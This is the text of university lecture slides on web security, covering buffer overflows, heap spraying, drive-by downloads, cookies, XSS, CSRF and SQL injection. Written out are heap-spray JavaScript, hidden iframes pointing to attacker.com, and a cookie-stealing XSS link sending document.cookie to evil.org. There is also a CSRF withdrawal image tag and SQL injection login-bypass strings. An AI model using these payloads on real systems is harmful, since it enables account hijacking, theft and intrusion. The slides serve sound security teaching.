1 Web Security Dr. 許 富 皓 Department of Computer Science and Information Engineering, National...
-
Upload
marylou-garrett -
Category
Documents
-
view
257 -
download
1
Transcript of 1 Web Security Dr. 許 富 皓 Department of Computer Science and Information Engineering, National...
1
Web Security
Dr. 許 富 皓Department of Computer Science and Information Engineering,
National Central University
2
Stack Smashing Attacks
3
Principle of Stack Smashing Attacks Overwritten control transfer structures, such
as return addresses or function pointers, to redirect program execution flow to desired code.
Attack strings carry both code and address(es) of the code entry point.
4
A Linux Process Layout and Stack Operations
kernel address space
Libraries
heap
BSS
data
code
high address
low address
stack
main()
{ :
G(1);
}
void G(int a)
{
:
H(3);
}
void H(int c)
{
:
}
env, argv, argc
EIP
main
G
H
5
Explanation of BOAs (1)
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Input String: abc
c
b
a
G’s stack frame
0xabc
0xaba0xabb
i
ebp
esp
6
Explanation of BOAs (2)
b
return address add_g
address of G’s
frame point
C[0]
H’s stack
frame
addrress oxabc
G(int a)
{
H(3);
add_g:
}
H( int b)
{ char c[100];
int i=0;
while((c[i++]=getch())!=EOF)
{
}
}
C[99]
Injected Code0xabc
Attack String: xxInjected Codexy0xabc
Length=108 bytes
0xaba0xabb x
x
x
y
i
X : 1 byte
y : 4 bytes
ebp
esp
7
Injected Code: The attacked programs usually have root
privilege; therefore, the injected code is executed with root privilege.
The injected code is already in machine instruction form; therefore, a CPU can directly execute it. However the above fact also means that the injected
code must match the CPU type of the attacked host.
Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.
8
Heap Spray and Drive-by Download
9
Heap Spray[Wikipedia][Nozzle]
Heap spraying is a technique used in exploits to facilitate arbitrary code execution.
Heap spraying is a security threat using a strategy of allocating many objects containing the attacker’s exploit code in an application’s heap.
Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.
10
Heap Spray Overview [Puttaraksa]
11
Implementation - JavaScript
Heap sprays for web browsers are commonly implemented in JavaScript andspray the heap by
making copies of a long string and storing these strings in an array, up to the point
where enough memory has been sprayed to cover the area that the exploit targets.
P.S.: The long string begins with a NOP sled and ends with shellcode.
12
Implementation - ActionScript
ActionScript In July 2009, exploits were found to be using
ActionScript to spray the heap in Adobe Flash.
13
Implementation - Images
ImagesThough it has been proven that heap-spraying
can be done through other means, for instance by loading image files into the process, this has not seen widespread use (as of August 2008).
Memory Corruption Exploit
14
15
Sources of Memory Corruption Exploit Mishandling Tag Attribute Values Virtual Table …
16
Mishandling Tag Attribute Values (1)
HTTP MS IE Malf. IFRAME/EMBED BO [Symantec] It is reported that an attacker can exploit this condition
by creating a malicious Web page containing a malformed IFRAME, FRAME or EMBED tag.
Specifically, the attacker creates the IFRAME, FRAME or EMBED tag by specifying large string values for the 'SRC' and 'NAME' properties.
These values are copied into finite sized process buffers resulting in memory corruption.
17
Mishandling Tag Attribute Values (2)[Julam]
<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
::
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
NAME=“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”></IFRAME>
Result: eip stops at address 0x769f682f
18
Mishandling Tag Attribute Values (3)[Julam]
memory = new Array();
for (i=0;i<700;i++)
memory[i] = block + shellcode;
19
Virtual Table [Foster et al.]
The virtual table is a lookup table of functions used to resolve function calls in a dynamic/late binding manner.
Class objects and structures are often stored on the heap.
One field of a class object is a pointer to its virtual table, called virtual-function table pointer.
20
Virtual Table [Foster et al.] – Overview
*__vptr
char a[100]
*__vptr
char a[100]
21
Virtual Table [Ratanaworabhan et al.] – Spraying the Heap <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%..."); oneblock = unescape("%u0D0D%u0D0D");
var fullblock = oneblock; while (fullblock.length<0x40000) { fullblock += fullblock; }
sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT>
NOP Sled
Shell Code
22
Result
Because the size of the sprayed heap area may be tens of MBs, ASLR may not work as expected.
23
Drive-by Download Attacks [wikipedia]
Download of spyware, a computer virus, or any kind of malware that happens without knowledge of the user.
Drive-by downloads may happen byvisiting a websiteviewing an e-mail message or by clicking on a deceptive popup window.
24
Clicking on a Deceptive Popup Window For instance, a user clicks on the window in the
mistaken belief that it is an error report from his own PC or that it is an innocuous advertisement popup.
In such cases, the "supplier" may claim that the user "consented" to the download though he was completely unaware of having initiated a malicious software download.
25
Drive-by Downloads using Web Pages Features:
1. Same appearance as the original webpage
2. Secret downloads
3. Automatic installation
4. Based on vulnerabilities of browsers, plug-ins, or OSes
26
Good web serverGood web serverVulnerable browserVulnerable browser
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
Malicious web serverMalicious web server
attacker.combad.htm
Client side WWW
27
Good web serverGood web serverVulnerable browserVulnerable browser
Malicious web serverMalicious web server
attacker.com
bad.htm
attacker2.com
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
Client side WWW
28
Discuss
Why not inject shell code at the first stage? (i.e. inject shell code to the “good web server” directly)
29
Drive-by Downloads
Why Drive-by-Downloads?Deploy malware on computers of victimsLarge scale (vs. target attacks)Bypass firewalls or NAT protection
Current solutionsStatic web-page analysisWeb-sites reputationMicrosoft Killbit
30
HTTP Cookie [Wikipedia]
31
HTTP Cookies HTTP cookies, sometimes known as web cookies or
just cookies, are parcels of text sent by a server to a web browser and then sent back unchanged by the browser each time it
accesses that server HTTP cookies are used for
authenticating tracking maintaining specific information about users, such as
site preferences the contents of their electronic shopping carts.
The term "cookie" is derived from "magic cookie," a well-known concept in Unix computing which inspired both the idea and the name of HTTP cookies.
32
Cookie Delivery
33
Examine the Cookies
Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing javascript:alert("Cookies: "+document.cookie) in the browser URL field.
Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.
34
Third-party Cookies
While cookies are only sent to the server setting them
orone in the same Internet domain,
a Web page may contain images or other components stored on servers in other domains.
Cookies that are set during retrieval of these components are called third-party cookies.
35
Using Third-party Cookies to Track a User’s Activity
Advertising companies use third-party cookies to track a user across multiple sites.
In particular, an advertising company can track a user across all pages where it has placed advertising images or Web bugs.
Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.
36
Tracking Example
37
Privacy Threat
The possibility of building a profile of users has been considered by some a potential privacy threat, even when the tracking is done on a single
domain but especially when tracking is done across
multiple domains using third-party cookies. For the above reason, some countries have
legislation about cookies.
38
Cross-site Scripting
Categories
Non-persistent XSS (Reflected XSS) the most common type nowadays
Persistent XSS
39
40
Non-persistent XSS
41
Through Hyperlinks An attacker may be able to embed their malicious code within a hyperlink to
the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteria without validating user supplied input , which consequently forces the execution of code from the evil attackers’ server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack: • disguises the link as a link to http://trusted.org, • can be easily included in an HTML email message, • does not supply the malicious code inline, but is downloaded from
http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.
Web browser
trusted.org
42
Ways to Deploy Hyperlinks
The user will most likely click on this link from another website, instant message,
or simply just reading a web board or email
message.
43
Non-persistent Cross Site Scripting (XSS) A non-persistent cross-site scripting (XSS)
vulnerability is caused by the failure of an web based application to validate user supplied input before returning it to the client system.
By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result in cookie theft, account hijacking, changing of web application account settings, spreading of a webmail virus, etc.
44
The Most Common Victims to Non-persistent XSS
The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation
routines. Additionally, a victim doesn’t necessarily have to click
on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
Each of these
components could
generate a web page.
45
Hijack Web Application Sessions
The most popular XSS attack (and devastating) is the harvesting ofauthentication cookies
andsession management tokens.
With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process.
46
Traditional Non-persistent XSS Web Application Hijack Scenario (1)
1. The attacker investigates an interesting site• that normal users must authenticate to gain access to and• that tracks the authenticated user through the use of
cookies or session ID’s
2. The attacker finds a XSS vulnerable page on the site, for instance http://trusted.org/account.asp.
3. Using a little social engineering, • the attacker creates a special link to the site and• embeds it in an HTML email that he sends to a long list of
potential victims.
47
Traditional Non-persistent XSS Web Application Hijack Scenario (2)4. Embedded within the special link are some coding
elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie); </script>">
5. Unknown to the victim, the attacker has now received a copy of their cookie information.
The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server application.
48
Traditional Non-persistent XSS Web Application Hijack Steps [David Endler]
49
SOLUTIONS AND WORKAROUNDS [David Endler]
50
For Users
As a web application user, there are a few ways to protect yourself from XSS attacks. The first and most effective solution is to
disable all scripting language support in your browser and email reader.
If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages.
51
Web Application Developers and Vendors
Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes
things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that is transmitted
between the browser and web server.
52
User Input Filtering The best philosophy to follow regarding user
input filtering is to deny all but a pre-selected element set of benign characters in the web input stream. This prevents developers from having to constantly
predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).
Some decent guidelines for input filtering can be found in the OWASP Requirements document “OWASP Guide to Building Secure Web Applications and Web Services".
53
Test
Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to upgrades integration of third party technologiesdecentralized website authoring
54
Vulnerability Web Application Scanners Many web application vulnerability scanners
start to include checks for XSS. The OWASP Testing group plans to produce a
methodology for checking XSS on a web application.
Web Scarab
55
Examples Used to Bypass Being Detected XSS Cheat Sheet
56
XSS Tool
XSS-Proxy
57
Cross-site Request
Forgery[Wikipedia]
58
Definition
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
59
Background
CSRF vulnerabilities have been known and in some cases exploited since the 1990s.
Because it is carried out from the user's IP address, CSRF is untraceable without proper logging.
60
Impact
As of 2007 there are few well-documented examples.
About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008.
Customers of a bank in Mexico were attacked in early 2008 with an image tag in email.
61
Example One user, Bob, might be browsing a chat forum where
another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element
that references a script on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie
and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will
submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
62
Common CSRF Characteristics
Involve sites that rely on a user's identity Exploit the site's trust in that identity Trick the user's browser into sending
HTTP requests to a target site Involve HTTP requests that have side
effects
63
Common CSRF Victims
At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.
A user that is authenticated by a cookie saved in his web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action.
64
Common CSRF Pitfalls
CSRF attacks using images are often made from Internet forums, where users are allowed to post images but not JavaScript.
65
CSRF Assumptions
This attack relies on a few assumptions: The attacker has knowledge of sites on which the
victim has current authentication (more common on web forums, where this attack is most common)
The attacker's "target site" has authentication cookies, or the victim has a current session cookie with the target site
The "target site" doesn't have secondary authentication for actions (such as form tokens)
66
Example Assume a script in the document at http://store.company.com/dir/other.html executes the following statement:
document.domain = "company.com"; After that statement executes, the page would
pass the origin check with http://company.com/dir/page.html.
However, by the same reasoning, company.com could not set document.domain to othercompany.com.
67
Prevention
For the web site, switching from a persistent authentication method (e.g. a cookie or HTTP authentication) to a transient authentication method (e.g. a hidden field provided on every form) will help prevent these attacks.
hidden field of a form
A similar approach is to include a secret, user-specific token in forms that is verified in addition to the cookie.
a field of a form filled out by a user
68
SQL Injection [SK]
69
What is SQL Injection?
Many web pages take parameters from web users, and make SQL query to the database. Take for instance when a user login a web page, the
web page accepts that user name and password and makes SQL query to the database to check if the user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
70
SQL Injection Attack Channels SQL injection is one type of web hacking
that require nothing but port 80 and it might just work even if the admin is patch-happy.
It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
71
What You Should Look for? Try to look for pages that allow you to submit data, i.e:
login page, search page, feedback, etc.
Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>
Everything between the <FORM> and </FORM> has potential parameters that might be useful (exploit wise).
72
What If You Can't Find Any Page That Takes Input? You should look for pages like ASP, JSP, CGI, or PHP web pages.
Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
73
How Do You Test If It Is Vulnerable? Start with a single quote trick. Input something like:hi' or 1=1--
into login, or password, or even in the URL. Example: - Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://duck/index.asp?id=hi' or 1=1—
If luck is on your side, you will get login without any login name or password.
74
Hidden Field
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.
Example:
<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>
75
Database Table Example[CQU]
76
Database Table productPName PCategory price number bar code
bread food 30 100 100-234-7
cake food 300 20 100-987-6
cookie food 50 70 100-812-9
model car
toy 200 20 300-567-7
figure toy 300 80 300-987-9
paper stationery 0.5 5000 981-897-7
pen stationery 20 300 981-967-0
77
Web Application Input and Its Corresponding SQL Query
Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code:
v_cat = request("category")sqlstr="SELECT * FROM product
WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.
78
Why ' or 1=1-- ? Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query,
which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
79
Other Crafted Input (1)
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
80
Other Crafted Input (2)
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--" or 1=1--or 1=1--' or 'a'='a" or "a"="a') or ('a'='a